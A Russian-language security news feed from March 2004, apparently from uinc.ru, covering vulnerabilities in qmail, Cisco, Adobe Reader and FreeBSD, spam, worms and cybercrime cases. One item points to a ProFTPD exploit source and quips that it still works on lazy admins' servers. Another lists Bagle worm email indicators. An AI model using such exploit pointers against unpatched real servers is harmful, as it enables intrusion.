Довольно любопытный проект под названием MD5CRK стартовал в Интернете 15 февраля 2004 г. Цель проекта - создание сети распределённого взлома алгоритма шифрования MD5. Алгоритм довольно широко применяется в Интернет как для задач кодирования паролей в UNIX-серверах, так и для создания хэшей таких протоколов, как SSL, создания цифровых подписей, проверки целостности этих подписей при помощи формируемых цифровых сигнатур. Сам алгоритм довольно подробно описан в RFC1321 - cм. http://www.faqs.org/rfcs/rfc1321.html. На сайте утверждается, что для создания специализированного компьютера, способного относительно быстро взломать MD5-хэш достаточно $100.000. Авторы проекта предлагают принять участие в нём. Выпущены клиенты для многих ОС - Windows, Linux, FreeBSD, NetBSD, SunOS. Напомним, что ранее был проведён конкурс по взлому зашифрованного сообщения RC5-64 (закончился летом 2002 г.), в настоящее время работают проекты по взлому RC5-72, OGR, в которых довольно активное участие принимает российская команда BugTraq.Ru Team, организованная коллегами с bugtraq.ru.
Сайт проекта - http://www.md5crk.com

7/03/2004 17:08 Очередной юбилей спама.
5 марта 2004 исполнилось 10 лет с момента отправки того, что принято считать первой коммерческой спамерской рассылкой, сообщает www.bugtraq.ru в лице руководителя проекта dl. В этот день американская юридическая компания Canter and Siegel отправила в несколько Usenet'овских конференций рекламу своих услуг для людей, желающих участвовать в лотерее US Green Card. Впрочем, есть и другие мнения по поводу того, с чего вести отсчет истории спама. 3 мая 1978 года представитель DEC разослал всем пользователям тогда еще Arpanet письмо, в котором сообщалось о дате демонстрации новых моделей компьютеров. А 31 марта 1993 Ричард Депью по ошибке разослал одно и тоже сообщение в 200 экземплярах, и вроде бы именно тогда все это получило название "спам". Согласно Net Abuse FAQ, Canter and Siegel не были формально первыми спамерами, но запомнились своей нахрапистостью, стремлением сделать на этом деле деньги, и уверенностью в своем праве на это. Кстати, Lawrence Canter с тех пор успел благополучно лишиться адвокатской практики...
Подробности - http://www.theregister.co.uk/content/6/36062.html

7/03/2004 16:35 ICQ расширяет круг знакомств.
Служба немедленного обмена сообщениями ICQ компании America Online не хочет отставать от моды на «светские сети». В четверг популярный сервис добавил функцию, которая позволяет людям знакомиться и общаться с друзьями своих друзей. Компания надеется, что таким способом она предоставит членам сообщества ICQ возможность безопасно знакомиться друг с другом и еще больше увеличит число зарегистрированных пользователей. Сейчас ICQ ежедневно обслуживает свыше 8 млн активных членов и имеет 175 млн зарегистрированных пользователей во всем мире.ICQ Universe сочетает стандартные функции ICQ с возможностями «светской сети». Обширные списки членов ICQ можно просматривать и теперь, но ICQ Universe позволит выбирать из них тех, с кем уже знакомы ваши друзья и коллеги. Вы получаете возможность видеть их «списки друзей» и, перед тем как познакомиться с новыми лицами, просмотреть информацию о них и проследить их связи. «Это хороший, безопасный способ знакомиться и общаться с людьми, так как вы всегда знаете, кто с кем связан», — убежден директор ICQ по маркетингу Йаэль Гивон. В клуб ICQ Universe можно попасть только по приглашению. Прежде чем добавить в сообщество кого-нибудь из существующего списка друзей, нужно, чтобы этот человек сам стал членом ICQ Universe. Тот, кто хочет присоединиться к ICQ Universe, но не получил приглашение от друга, может зарегистрироваться как гость и войти в виртуальный «холл» клуба. Там можно просмотреть информацию о членах ICQ Universe и быстро оформить заявление о вступлении в сообщество. В холле гости могут также общаться друг с другом и с членами клуба и легко найти желающих послать им приглашение в ICQ Universe. Получив приглашение, новые члены ICQ Universe могут заводить знакомства и приглашать других. Служба бесплатная и поддерживается той же самой бизнес-моделью на основе рекламы, что и сама ICQ.
Подробности - http://zdnet.com.com/2100-1104_2-5169846.html

7/03/2004 16:13 Универсальная среда разработки WindPower IDE 2.
Компания Wind River, производитель средств разработки ПО встраиваемых 32-разрядных микропроцессорных систем, объявила о планах создания второй версии универсальной интегрированной среды разработки WindPower IDE. Выпускаемая в настоящее время среда WindPower IDE 1.x предназначена для разработки ПО компьютерных систем, не содержащих ОС. Используя новую версию WindPower IDE 2.x разработчики смогут применять единую унифицированную среду разработки для трех вариантов среды исполнения - без операционной системы, на базе Linux и VxWorks. WindPower IDE 2 for Linux выйдет в мае 2004 года. Она будет поддерживать Red Hat Embedded Linux - совместную разработку Red Hat и Wind River, которая будет поставляться по каналам Wind River. На основе Red Hat Embedded Linux планируется создание интегрированных платформ для различных областей применения. В течение 2004 года выйдет WindPower IDE 2 for VxWorks. Одновременно появится VxWorks 6.0 - ОСРВ нового поколения с технологией защиты памяти. Начиная с VxWorks 6.0, среда WindPower IDE заменит среду разработки Tornado, применяемую в настоящее время для VxWorks 5.x.
Источник - http://www.osp.ru

7/03/2004 15:47 Суд Барселоны вынес приговор по делу о взломе электронного почтового ящика.
Магистратский суд Барселоны вынес решение по делу 28-летней Моники П. С., признав ее виновной в разглашении личных сведений другого человека, сообщает агентство Europa Press. Согласно вердикту, преступница, незаконным образом пользовавшаяся чужим электронным почтовым ящиком, приговорена к 2 годам лишения свободы условно, штрафу и выплате пострадавшей от ее деятельности компенсации в размере 26886,2 евро. Помимо незаконного доступа к чужому почтовому ящику Монику признали виновной в уничтожении чужих писем и нанесении серьезных психологических травм путем отправки посланий от имени потерпевшей. Вердикт суда стал результатом соглашения, достигнутого между обвинением и защитой, несмотря на то, что изначально прокурор требовал для Моники 5 лет лишения свободы, а потерпевшая - семь. Свои преступления Моника совершила в ноябре 2001 года. Тогда осужденная со своего домашнего компьютера сумела получить доступ к учетной записи сокурсницы в почтовой службе Hotmail. Для этого Моника воспользовалась некоторыми личными данными потерпевшей. Получив доступ к электронной почте, преступница сменила пароль и лишила законную владелицу ящика доступа к своим сообщениям. Затем Моника отослала от имени потерпевшей несколько писем компрометирующего содержания и уничтожила входящие послания. После задержания в феврале 2002 года свои действия Моника мотивировала любопытством.
Источник - http://www.viruslist.ru

6/03/2004 18:28 Локальное переполнение буфера в qmail-qmtpd.
Переполнение буфера обнаружено в qmail-qmtpd. Локальный пользователь может получить поднятые привилегии. Локальный пользователь может установить RELAYCLIENT переменную окружения к специально сформированному значению, чтобы вызвать переполнение буфера. Выпущен эксплоит, а также неофициальный патч.
Подробности - http://www.securitylab.ru/43394.html

6/03/2004 18:16 Удивительное рядом, или Россия - родина BOOTP.
Как сообщает Вебпланета с подачи ИТАР-ТАСС, тамбовскому студенту Александру Васильеву удалось решить задачу, над которой, оказывается, "безуспешно бились в последние годы программисты страны", а именно изобрести "программу бездисковой загрузки компьютеров". Что, по словам ректора его университета, позволило создать некий уникальный комплекс централизованного тестирования, а заодно и получить президентскую стипендию. О том, что в природе уже многие годы существуют тонкие клиенты, X-терминалы и бездисковые рабочие станции, в заметке скромно умалчивается. Хотелось бы надеяться, что вся эта история - лишь следствие традиционного журналистского непрофессионализма, в результате которого услышанная краем уха тема работы преобразовалась таким вот чудесным образом, но слова об уникальном комплексе, аналогов которому нет в мире, наводят на грустные мысли.
Исчтоник - http://www.bugtraq.ru

6/03/2004 18:06 Материалы по домашним сетям - в открытом доступе.
На сайте журнала "Компьютерра" открыты для свободного доступа материалы №6 (530) за 2004 г.. Тема номера - "Интернет нашего двора" - посвящена домашним сетям. В рамках этой темы опубликованы статьи: - Александр Милицкий, "Убежать от паровоза" - о развитии различных технологий доступа в Интернет и о том, почему Ethernet-провайдинг сначала никем не рассматривался всерьез, а стал популярным только сейчас; - Алекс Экслер, "Домовые и барабашки домашних интернетов" - о том, какие напасти подстерегали автора при подключении через любительскую сеть и через профессионального Ethernet-провайдера; - Сергей Леонов, "А вот и NET" - интервью с руководством одного из московских Ethernet-провайдеров. Продолжение темы - в следующем номере, вышедшем на бумаге 24 февраля 2004 г.. Материалы этого номера появятся полностью на сайте ориентировочно через неделю. Центральное место в теме номера занимает большой и подробнейший обзор московского рынка широкополосного доступа от Александра Милицкого.
Подробности - http://www.provider.net.ru/news.php?ts=1078437692

6/03/2004 17:24 В коммутаторах Cisco обнаружена уязвимость.
Компания Cisco сообщила об обнаружении уязвимости в коммутаторах Cisco Content Services Switch серии 11000. Использование этой уязвимости может привести к проведению злоумышленниками DoS-атак, вызывающих перезагрузку коммутатора. Уязвимость вызвана тем, что устройство некорректно обрабатывает на порту управления пакеты, направляемые на порт 5002/UDP. Эксплуатация уязвимости возможна только при наличии доступа в сеть управления. Уязвимости подверженны устройства под управлением Cisco WebNS версий 5.0(x) и 6.10(x).
Подробности - http://www.cisco.com/warp/public/707/cisco-sa-20040304-css.shtml

6/03/2004 16:41 Опасная дыра в Adobe Acrobat Reader.
Британская компания NGSSoftware выпустила предупреждение об обнаружении опасной уязвимости в пятой версии пакета Adobe Acrobat Reader, cообщает "Компьюлента". Ошибка связана с возникновением ошибки переполнения буфера при обработке файлов, содержащих XML-формы (файлы .xfdf). В NGSSoftware считают, что уязвимость представляет большой риск для пользователей. Особенно опасно то, что в большинстве случаев такие файлы без предупреждения открываются в окне браузера после загрузки их из интернета. Файлу даже не обязательно иметь расширение .xfdf, главное, чтобы тип MIME имел значение application/vnd.adobe.xfdf. В этом случае браузерный плагин Acrobat Reader откроет файл. В результате, для проведения успешной атаки злоумышленнику необходимо разместить особым образом сформированный файл в формате .xfdf на своем сайте и заманить туда пользователя. Впрочем, последняя версия программы для чтения файлов PDF - Adobe Reader 6.0 - не содержит данной уязвимости. Патчей для Acrobat Reader 5, скорее всего, выпускаться не будет, и NGSSoftware рекомендует всем ее пользователям обновиться до шестой версии.
Подробности - http://www.nextgenss.com/advisories/adobexfdf.txt

6/03/2004 15:55 Билл Гейтс предложил ввести марки для e-mail.
Глава Microsoft Билл Гейтс предложил новый способ защиты от нежелательных почтовых рассылок - спама, сообщает Associated Press. Идея, которую исследовательское подразделение корпорации разрабатывало с 2001 года, была озвучена Гейтсом в январе на Всемирном экономическом форуме в Давосе. Детали же ее стали известны на прошлой неделе. Отец Windows предложил ввести специальные "марки", которыми снабжалось бы каждое отправление по e-mail. Стоимость подобных "марок", по мнению Microsoft, должна быть ничтожно мала - пенни или меньше за штуку. В подобной ситуации пользователь, отправляющий несколько писем в день, вполне сможет позволить себе их приобретение. В то же время спамеры, рассылающие разово миллионы сообщений, будут терпеть убытки, соизмеримые с получаемым или от рассылок заработком. Подобный метод защиты от спама не нов. К примеру, программа Hashcash, существующая с 1997 года, использует похожий принцип, работая в союзе с различными спам-фильтрами вроде Camram или Spam Assassin. Одновременно компания Goodmail Systems Inc. сотрудничает с Yahoo! и другими службами, предоставляющими почтовые услуги. В ее планах - взимание пенни с каждого письма ради того, чтобы оно благополучно миновало спам-фильтры. Перспектива реализации подобных проектов вызывает множество споров. Основные вопросы - насколько взимание платы будет кореллировать с идеологией сети интернет, как бесплатного и демократичного средства общения и обмена информацией? Насколько такие системы будут защищены от различных уловок спамеров и нападений хакеров? Как будет взиматься плата в странах, не имеющих столь развитых информационных сетей, как США? Критики подобного нововведения видят более перспективным путь улучшения работающих с e-mail программ и спам-фильтров, а также совершенствование законодательства. "Мы возвращаемся в начало девяностых, когда существовали e-mail-сервисы, взимавшие по 10 центов за письмо. И все они сейчас мертвы", - заявил Джон Левин (John Levine), адвокат, занимающийся вопросами борьбы со спамом.
Источник - http://www.lenta.ru

5/03/2004 13:07 Двое российских студентов задержаны по ст. 207 УК РФ за угрозы в адрес сайта ЦРУ.
Обвинение по статье "Заведомо ложное сообщение об акте терроризма" предъявлено двум студентам Алтайского технического университета. Они, как сообщили сегодня в ГУВД Алтайского края, направили в ночь с 26 на 27 февраля из интернет-кафе в Барнауле электронное письмо на официальный сайт ЦРУ США с угрозами о взрывах в метро Америки. Послания были написаны на английском языке и заканчивались словами: "Вы все умрете. Аллах акбар!, сообщает crime-research.ru. Американские спецслужбы установили, что письма адресованы из России. К расследованию были подключены сотрудники отдела "К" по борьбе с преступностью в сфере высоких технологий ГУВД Алтайского края, которые установили, откуда и кем было написано письмо с угрозами. Студенты задержаны и теперь им грозит до трех лет лишения свободы по по статье ст. 207 УК РФ "Заведомо ложное сообщение об акте терроризма".
Источник - http://www.securitylab.ru

5/03/2004 10:30 Мошенники нашли способ заработать на SMS.
В последнее время появились сообщения о новом виде мошенничества с использованием сервиса SMS. Схема такова: абоненту сотовой сети приходит SMS с незнакомого телефонного номера с текстом: «Привет, как дела?». В случае, если абонент заинтересуется и отправит ответ (неважно, какого содержания), приходит следующее SMS: «Меня зовут Ольга. Я скучаю дома, надеюсь, я тебя не отвлекла». Далее, на все последующие сообщения абонента, приходит одно и то же SMS: «Мы с тобой не знакомы, я просто отправила тебе sms и ты мне ответил. Классно!!!». Входящие SMS генерируются программой-роботом,а исходящие сообщения обходятся любителю мобильного общения с незнакомцами гораздо дороже, чем предусмотренно его тарифным планом. Можно предположить, что со временем подобная SMS-переписка будет все больше походить на общение с живым человеком, ведь программу-робот можно научить адекватно реагировать на некоторые слова или словосочетания. Но уже сейчас мошенники, завлекающие в SMS-общение, заранее знают с кем они имеют дело - с мужчиной или с женщиной, что можно объяснить недобросовестностью некоторых сотрудников операторов связи или доступностью их баз данных.
Источник - http://www.cnews.ru

5/03/2004 10:03 Появился эмулятор Palm OS 6.0.
На сайте компании PalmSource выложен для скачивания эмулятор новой Palm OS 6.0 (Cobalt). Новая Palm OS является многозадачной и обладает расширенными функциями по защите памяти, поддержке беспроводной связи и мультимедии. Благодаря эмулятору разработчики могут легко протестировать и отладить свои приложения, обозревателям и техническим писателям он пригодится для снятия скриншотов, а простые пользователи смогут оценить полезность программы на обычном компьютере, прежде чем устанавливать ее на наладонник. К услугам пользователя предоставляются экранная клавиатура и область для ввода Graffiti. А тем, кто еще только подумывает о покупке КПК на базе новой Palm OS 6.0, новый эмулятор и вовсе необходим для принятия окончательного решения. Тем более, что устройства на базе новой ОС пока не появились на рынке. Для скачивания эмулятора необходима бесплатная регистрация, после прохождения которой будут доступны и другие утилиты для разработчиков приложений под Palm OS.
Подробности - http://www.palmos.com/dev/dl/dl_tools/dl_simulator/

5/03/2004 09:39 Нидерланды будут сажать в тюрьму вирусописателей и спамеров.
Власти Нидерландов ужесточили наказание за рассылку спама и распространение компьютерных вирусов, сообщает сайт Sky News. Теперь голландские вирусописатели и спамеры могут оказаться в тюрьме на срок до одного года. Принимая новый закон, Нидерланды становятся одной из первых европейских стран, действующих в соответствии с Конвенцией о киберпреступлениях, подписанной в 2001 году Советом Европы, США и Японией. «Последствия деятельности спамеров и вирусописателей могут оказаться более серьезными, чем последствия хакерских атак», - прокомментировал решение об ужесточении наказания пресс-секретарь Министерства юстиции Нидерландов. Прежде организация DoS-атак в этой стране не являлась уголовно наказуемым преступлением. Теперь правоохранительным органам не нужно будет доказывать наличие преступного умысла в действиях хакеров: любое незаконное проникновение в систему будет признано преступлением, наказуемым шестью месяцами лишения свободы.
Источник - http://www.kaspersky.ru

5/03/2004 09:16 SIM-карты телефонов выдали террористов ''Аль-Каеды'' спецслужбам.
Спецслужбам удалось арестовать десятки подозреваемых в причастности к деятельности "Аль-Каеды" благодаря особому типу SIM-карты, сообщается в пятницу на сайте газеты The Independent. Террористы использовали мобильную связь для общения друг с другом, часто меняя аппараты и номера. Швейцарским спецслужбам удалось установить, что при этом члены "Аль-Каеды" предпочитали SIM-карты с заранее оплаченным временем, которые подходят для звонков по всему миру. Такие карты продавались швейцарским оператором мобильной связи Swisscom. До недавнего времени их можно было приобрести, не предоставляя информации о покупателе. Между тем, отслеживание звонков, совершаемых по швейцарским картам, не представляет особого труда. Так, 11 апреля 2002 года следователям удалось засечь звонок 36-летнего Кристиана Ганчарского (Christian Ganczarski), немецкого подданного, подозреваемого в связях с террористами, Халиду Шейху Мохаммеду (Khalid Sheikh Mohammed), одному из руководителей "Аль-Каеды". Звонок был сделан, чтобы предупредить о готовящемся теракте в синагоге в Тунисе, в результтате которого погиб 21 человек. Когда немецкая полиция провела у Ганчарского обыск, следствие получило в распоряжение большое количество номеров мобильных телефонов, один из которых, как оказалось позже, принадлежал Мохаммеду. Затем удалось установить местонахождение самого Мохаммеда, и в марте 2003 года он был арестован. В его записной книжке содержались десятки номеров, которые в дальнейшем значительно облегчили поимку многих террористов. Как выразился представитель разведслужбы одной из европейских стран, отслеживание SIM-карт компании Swisscom было наиболе эффективным инструментом следствия. Однако теперь террористы уже не используют мобильную связь, предпочитая для общения интернет-телефонию, электронную почту и интернет-пейджеры. Тем не менее, операция по выявлению террористов "Аль-Каеды" по SIM-картам, получившая в 2002 году название "Монблан", позволила предотвратить по крайней мере три теракта в Саудовской Аравии и Индонезии.
Источник - http://www.lenta.ru

4/03/2004 16:34 Сетевой антивирус.
Компания Trend Micro выпустила продукт Network VirusWall 1200, который будет защищать от вирусов не клиентские машины или почтовые серверы, а корпоративную сеть. Антивирус будет определять сетевую активность вирусов, червей и других агрессивных программ и блокировать их работу. Для этого антивирус будет пользоваться информацией о найденных погрешностях ИТ-инфраструктуры и известных методах нападения. Заявленная функциональность объединяет в одном продукте антивирус, межсетевой экран и средство предотвращения вторжений.
Источник - http://www.osp.ru

4/03/2004 16:31 SCO подала в суд на двух крупных пользователей Linux.
Продолжая боевые действия вокруг операционных систем Unix и Linux, SCO Group подала судебные иски, направленные против продавца автомобильных запчастей AutoZone и автопроизводителя DaimlerChrysler. SCO обвиняет AutoZone в «нарушении авторских прав SCO на Unix посредством исполнения версий операционной системы Linux, содержащих код, структура, последовательность и/или организация которого взяты из принадлежащего SCO кода Unix System V», говорится в опубликованном в среду заявлении. В тот же день представитель компании Блейк Стоуэлл объявил, что SCO подала иск и против DaimlerChrysler, обвиняя автопроизводителя в нарушении контракта по Unix с SCO. «Мы не видели иска, поэтому не можем комментировать его», — сказал представитель AutoZone, у которой 3000 магазинов по всей стране. Комментарии DaimlerChrysler получить не удалось. По мнению не участвующего в этом деле специалиста по правам интеллектуальной собственности Марка Рэдклиффа, в действиях SCO есть стратегический смысл: «Им нужно начать судиться с пользователями, так как те меньше всего хотят тратить деньги на защиту. Они обратятся за помощью к своим дистрибьюторам, а это увеличит давление на IBM, от которой будут требовать гарантий».
Источник - http://zdnet.com.com/2100-1104_2-5168921.html

4/03/2004 16:21 Microsoft выпустила новую версию пакета BizTalk Server.
Корпорация Microsoft представила новую версию программного пакета для интеграции бизнес-приложений BizTalk Server 2004. Данный программный продукт выполняет несколько основных задач, позволяющих компаниям автоматизировать рабочий процесс. Во-первых, BizTalk Server осуществляет пересылку и маршрутизацию документов. При этом могут использоваться протоколы HTTP, SMTP, SOAP, а также интерфейсы API. Во-вторых, сервер проводит автоматизацию рутинных операций и управление. Кроме того, в задачи пакета входит преобразование данных. По сравнению с предыдущей версией, BizTalk Server 2004 отличается рядом весьма существенных нововведений и улучшений. Прежде всего, нужно отметить повышенную безопасность и возросшие возможности в плане масштабирования. Софтверный гигант добавил в пакет дополнительный движок бизнес-правил и обеспечил интеграцию среды разработки BizTalk Server 2004 в интерфейс Visual Studio .NET. Программный продукт распространяется в четырех модификациях. Вариант Enterprise Edition обойдется покупателю в 25 тысяч долларов США из расчета на один процессор; версия Standard Edition продается по цене в семь тысяч долларов из расчета на процессор; Partner Edition и Developer Edition стоят одну тысячу и 750 долларов в расчете на процессор, соответственно.
Источник - http://www.compulenta.ru

4/03/2004 15:10 Террористы готовят беспрецедентную атаку на Интернет.
Международные террористические группировки готовят беспрецедентную атаку на Интернет для сбоев в системах крупнейших экономических и финансовых центрах Запада. Предупреждение об атаке исходит из аналитических центров безопасности США. По мнению американских экспертов, последствия террористической атаки в Интернете будут сравнимы с событиями 11 сентября 2001 года в Нью-Йорке. Как сообщает сегодня ИТАР-ТАСС, cпецслужбами ряда стран Запада уже получены данные о том, что преступные группировки завершают работы над новым поколением вирусов, способных привести к краху всей мировой финансовой системы и инфраструктуры, включая электросистему, водопровод, работу целых отраслей промышленности. Эксперты предлагают в экстренном порядке перейти от нынешней системы Интернета, концепция которого была создана в 70-е годы, на новую и более защищенную систему.
Источник - http://www.securitylab.ru

4/03/2004 14:00 Анонс!
судя по последним логам, господа из противоположного стана, которых принято называть спамерами развернули очень серьёзную войну. Со своей стороны - мы готовы принять их условия и будем публиковать сведения с "фронта боевых действий". На данный момент - в нашем распоряжении - прикрытый спамер из республики Мари-Эл и прикрытый спамер от провайдера ROL. IP по этическим соображениям приводить не будем. Со своей стороны - назначем политику под нзванием UINCP - если нам в течении 2 дней не отвечает провайдер спамера - мы кидаем здесь его IP-адрес! По крайней мере - это будет честно!
источник - http://www.uinc.ru

4/03/2004 13:55 Суд Барселоны вынес приговор по делу о взломе электронного почтового ящика.
Магистратский суд Барселоны вынес решение по делу 28-летней Моники П. С., признав ее виновной в разглашении личных сведений другого человека, сообщает агентство Europa Press. Согласно вердикту, преступница, незаконным образом пользовавшаяся чужим электронным почтовым ящиком, приговорена к 2 годам лишения свободы условно, штрафу и выплате пострадавшей от ее деятельности компенсации в размере 26886,2 евро. Помимо незаконного доступа к чужому почтовому ящику Монику признали виновной в уничтожении чужих писем и нанесении серьезных психологических травм путем отправки посланий от имени потерпевшей. Вердикт суда стал результатом соглашения, достигнутого между обвинением и защитой, несмотря на то, что изначально прокурор требовал для Моники 5 лет лишения свободы, а потерпевшая - семь. Свои преступления Моника совершила в ноябре 2001 года. Тогда осужденная со своего домашнего компьютера сумела получить доступ к учетной записи сокурсницы в почтовой службе Hotmail. Для этого Моника воспользовалась некоторыми личными данными потерпевшей. Получив доступ к электронной почте, преступница сменила пароль и лишила законную владелицу ящика доступа к своим сообщениям. Затем Моника отослала от имени потерпевшей несколько писем компрометирующего содержания и уничтожила входящие послания. После задержания в феврале 2002 года свои действия Моника мотивировала любопытством.
Источник - http://www.viruslist.ru

4/03/2004 12:49 Предупреждение спамерам!
Неуважаемые господа спамеры! В связи с участившейся вашей активностью, связанной с идиотской тягой заработать лишний цент в никому ненужной попытке впарить никому ненужную рекламу, смееем вас предупредить, что любые попытки вычисления почтовых адресов членов команды UINC будут пресекаться самым серьёзным и решительным образом! Смеем вас уверить, что методы и способы пресечения подобной деятельности у нас имеются!
Источник - /dev/null

3/03/2004 18:34 Секретный код в навозной куче.
В Москве задержан молодой человек, продававший секретные PIN-коды карточек экспресс-оплаты доступа в сеть интернет. Как сообщают в пресс-службе первой оперативно-розыскной части криминальной милиции (1 ОРЧ КМ) ГУВД столицы, в феврале в милицию обратились представители одной крупной компании, предоставляющей услуги доступа в Сеть. Они сообщили, что неизвестные используют секретные PIN-коды карточек экспресс-оплаты, при этом часть этих карточек даже не поступили еще в продажу. В ходе проведения комплекса оперативно-розыскных мероприятий был установлен 22-летний житель Москвы, работающий радиомонтажником, который на форумах в интернете продавал PIN-коды карточек экспресс-оплаты не только обратившейся в 1 ОРЧ КМ компании, но и других организаций, предоставляющих услуги связи. На днях молодой человек при проведении очередной сделки с покупателем в интернет-кафе, расположенном в районе Лубянской площади, был изобличен в совершении противоправных действий. Также было установлено, что «все карточки экспресс-оплаты изготавливались на коммерческой типографии «Рускарт», расположенной на Новой Басманной улице. В процессе изготовления некоторые карточки получались бракованными и уничтожались ненадлежащим способом, после чего просто выбрасывались на территории типографии», – отметили в пресс-службе. Молодой человек работал в одном из офисов, расположенном на территории «Рекарт», где и подбирал остатки карточек, среди которых и были карточки указанной компании, а также многих других интернет-провайдеров, операторов IP-телефонии и сотовой связи. Собрав и сложив обрезки он получил секретные PIN-коды. Некоторые карточки он использовал сам, а остальные продавал на форумах в Сети за полцены. Встречи с покупателями проходили в интернет-кафе.
Источник - http://www.securitylab.ru

3/03/2004 18:00 Эксплоит уязвимости ProFTPD.
Некто Haggis выпустил исходник эксплоита уязвимости, ранее обнаруженной в довольно популярном FTP-сервере ProFTPD. Обновления, кстати, уже давно выпущены, но ввиду безолабарности определённой части СИСАДМИНов эксплоит может быть всё ещё актуален. ;))
Исходник - http://www.security.nnov.ru/files/proft_put_down.c

3/03/2004 17:11 Уязвимость в FreeBSD.
Выпущен бюллетень по безопасности FreeBSD-SA-04:04.tcp, в котором описывается очередная уязвимость в этой довольно надёжной ОС (что-то они зачастили в крайнее время - прим. ньюсмейкера). Уязвимость была обнаружена известнейшей компанией iDEFENCE. Уязвимость присутствует в TCP/IP-стеке ядра FreeBSD, с помощью которой любой клиент может создать DoS-атаку с минимальным траффиком. В противном случае у системы не останется свободных сетевых буферов (mbufs), что скорее всего приведет к краху всей системы. Для успешного проведения атаки требуется хотя бы один открытый TCP-порт. Существует код эксплоита, при помощи которого можно провести атаку. FreeBSD team уже выпустили обновления к ядру. Существуует вероятность, что подобная уязвимость существует и в других ОС.
Подробности - http://www.idefense.com/application/poi/display?...

3/03/2004 16:57 Проверь себя: новый тест от dsec.ru.
Как сообщает cybervlad на bugtraq.ru, Digital Security предлагает новый тест на знание методики оценки рисков информационных систем. Формулировки вопросов/ответов местами спорные, но в общем - интересно.
Подробности - http://www.dsec.ru/test/test_itrisk.php

3/03/2004 16:34 Oracle просит помощи у Microsoft.
По иронии судьбы Oracle пришлось обращаться к своему злейшему врагу за информацией для защиты от антимонопольного иска, поданного Министерством юстиции США. Представительница Oracle Дженнифер Гласс подтвердила, что Oracle просит Microsoft обнародовать свои планы по расширению доли рынка ПО бизнес-приложений. На прошлой неделе Минюст подал иск против Oracle с требованием заблокировать враждебное поглощение компании PeopleSoft за 9,4 млрд долл. Oracle намерена оспорить этот иск, в котором утверждается, что слияние оставит крупным компаниям выбор всего из двух поставщиков ПО: Oracle и SAP, а это приведет к повышению цен. Комичность ситуации в том, что глава Oracle Ларри Эллисон был одним из самых ярых критиков Microsoft в тот период, когда Редмонд сам отбивался от антимонопольного иска, возбужденного тем же ведомством, которое теперь блокирует планы по укрупнению Oracle. Тогда Эллисон призывал разделить Microsoft на отдельные компании и до сих пор в своих выступлениях любит называть ее «осужденным монополистом». Представитель Microsoft отказался говорить на эту тему, а также сказать, получала ли компания какие-либо запросы от Oracle, ее адвокатов или от Минюста.
Источник - http://www.zdnet.ru

3/03/2004 15:31 Противоспамовые фильтры провайдера Comcast заблокировали Россию.
Массовое внедрение противоспамовых фильтров несет в себе не только блага в виде избавления от огромного количества мусорной корреспонденции, но и проблемы, связанные с ложными срабатываниями и просто неправильной настройкой фильтров. Лишним подтверждением этого стал инцидент, случившийся с абонентами американского кабельного провайдера Comcast. В течение некоторого времени пользователи Comcast не могли получать и принимать почту, отправленную с серверов в домене .ru. Сбой возник в прошлую пятницу. Многие из тех, кто общается по электронной почте с теми пользователями, чьи почтовые ящике расположены в домене .ru, обнаружили проблему. В результате, начиная с субботы, в службу технической поддержки Comcast начали поступать многочисленные жалобы. Анализ ситуации показал, что в проблеме виноват противоспамовый фильтр. Как оказалось, почтовые серверы Comcast получили множество спама с поддельными обратными адресами в домене .ru. В результате, фильтр просто заблокировал прием и отправку почты в эту доменную зону. Технические специалисты Comcast устранили эту проблему, и в компании заявляют, что блокировка .ru работала непродолжительное время. Тем не менее, многие пользователи утверждают, что избежать проблем, связанных с блокировкой писем, им удалось лишь с помощью альтернативных почтовых ящиков.
Подробности - http://news.com.com/2100-1038_3-5168643.html

3/03/2004 14:26 Появление I-Worm.Bagle.i.
Лаборатория Касперского" сообщает об обнаружении очередной версии червя Bagle. Данная модификация, получившая название I-Worm.Bagle.i, распространяется через электронную почту и файлообменные сети и имеет размер 12288 байт. Как и предыдущие версии червь способен рассылать свои копии в виде закрытых паролем ZIP-архивов.В таком случае пароль к архиву указывается в теле письма. Размер ZIP архива равен приблизительно 12KB. Характеристики зараженных писем следующие. Адрес отправителя: administration@, management@, noreply@, staff@, support@. В качестве домена отправителя подставляется домен получателя письма. Варианты темы письма: E-mail account disabling warning. E-mail account security warning. Email account utilization warning. Important notify about your e-mail account. Notify about using the e-mail account. Notify about your e-mail account utilization. Warning about your e-mail account.
Более подробно - http://www.viruslist.ru/alert.html?id=144728906

3/03/2004 13:53 В интернете разгорелась "война червей".
В интернете развернулась настоящая война между авторами компьютерных вирусов MyDoom, Bagle и Netsky, сообщается на сайте британского компьютерного журнала PC Pro. Новые варианты вирусов появляются с угрожающей частотой, и каждый из них пытается выдавить чужаков с зараженного компьютера, поставив его под свой контроль, при этом они содержат угрожающие послания с ненормативной лексикой в адрес конкурентов. В среду утром были зафиксированы очередные разновидности уже известных червей: MyDoom-G и H, Bagle-J м K, а также Netsky.F. Некоторые эксперты, полагают, что за деятельностью вирусописателей стоят финансовые интересы различных компаний, занимающихся распространением спама, несанкционированной интернет-рекламы. Вирусы все время меняют тактику проникновения в компьютеры. Их авторы давно уже не ограничиваются рассылкой писем с приложениями, к которым пользователи привыкли и потому соблюдают особую осторожность, а используют теперь систему мгновенного обмена текстовыми сообщениями ICQ. Кроме того, вирус MyDoom-G не допускает рассылки себя на сайты компаний, занимающихся обеспечением информационной безопасности, что затрудняет его своевременное обнаружение.
Подробности - http://www.cmpnetasia.com/ViewArt.cfm?Artid=23047&Catid=3&subcat=50

3/03/2004 13:20 От Касперского не запакуешься.
"Лаборатория Касперского" представляет первую в мире технологию борьбы с новым поколением сетевых червей, распространяющихся в ZIP-архивах, защищенных паролем. Распространение вредоносных программ в защищенных ZIP-архивах существенно усложняет процедуру их нейтрализации. С одной стороны, требуется внедрение технологии подбора пароля для сканирования таких файлов. С другой - проверка этих данных требует большого объема системных ресурсов и способна заметно снизить производительность компьютера. Первой вредоносной программой, распространявшейся в ZIP-архивах с паролем был почтовый червь "Fearso", обнаруженный летом 2003 г. Несмотря на существование 24 модификаций данный червь так и не получил широкой известности. Однако, последние образцы червя "Bagle" (версии F, G, H, I, J), появившиеся в период 27 февраля - 3 марта 2004 г. вновь напомнили об опасности такого способа распространения. В этих условиях "Лаборатория Касперского" разработала уникальную технологию для защиты от вредоносных программ в ZIP-архивах с паролем, которая сочетает надежность и быстродействие. Теперь Антивирус Касперского способен распознавать защищенные архивы, осуществлять поиск паролей в тексте электронного письма и проверять такие файлы на наличие вирусов. "Внедрение этой технологии позволит пользователям более эффективно защищаться от нового поколения вредоносных программ, скрывающихся от антивирусов в архивах с паролем. Появление сразу 5 сетевых червей такого типа всего за 4 дня однозначно демонстрирует 